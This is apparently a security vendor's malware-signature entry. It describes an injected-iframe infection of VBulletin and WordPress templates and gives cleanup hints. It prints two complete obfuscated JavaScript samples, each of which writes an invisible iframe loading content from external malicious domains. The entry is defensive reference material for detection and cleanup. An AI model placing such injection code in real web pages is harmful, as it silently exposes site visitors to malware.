Home Testimonials Company Support 1–888–873–0817
PRICING SUPPORT LOGIN
Home Notes Malware Signatures About

Malware entry: MW:IFRAME:HD21

Description: Javascript encoded code used to hide an iframe from http://img102.imageshacks.net/img102/4681/head.jpeg and a few different domains.

This is used to load malware from external web sites while not being visible to the user.

Affecting: VBulletin and Wordpress sites.

Clean up: This malware is generally hidden inside the template footer or header.

Malware dump (sample of malware):

<script>var _0x38745= ["x77x72x69x74x65"]; var ccBca=document; var aaacB = '<iframJQ21KL#AZ XLMS9Q21rc="http%3A%2F%2Fimg102.imageshacks.net%2Fimg102%2F4681%2Fhead.jpeg" width="1" hJQ21KL#AZight="0" framJQ21KL#AZbordJQ21KL#AZr="0"></iframJQ21KL#AZ>'; var acBaa = aaacB.replace(/XLMS9Q21/g,"s"); var acBac = acBaa.replace(/LSM21ghk8/g,"o"); var BaaBa = acBac.replace(/JQ21KL#AZ/g,"e");ccBca[_0x38745[0]](unescape(BaaBa));</script> <script>var _0x110261= ["x77x72x69x74x65"]; var aBBcB=document; var ccccc = '<iframJQ21KL#AZ XLMS9Q21rc="http%3A%2F%2Fimg121.imagehacks.info%2Fimg121%2F103%2Fheader.jpeg" width="1" hJQ21KL#AZight="0" framJQ21KL#AZbordJQ21KL#AZr="0"></iframJQ21KL#AZ>'; var BBBcB = ccccc.replace(/XLMS9Q21/g,"s"); var ccBBB = BBBcB.replace(/LSM21ghk8/g,"o"); var cBcBc = ccBBB.replace(/JQ21KL#AZ/g,"e");aBBcB[_0x110261[0]](unescape(cBcBc));</script>

For all our web-based malware signatures, go here: http://labs.sucuri.net/?malwaredb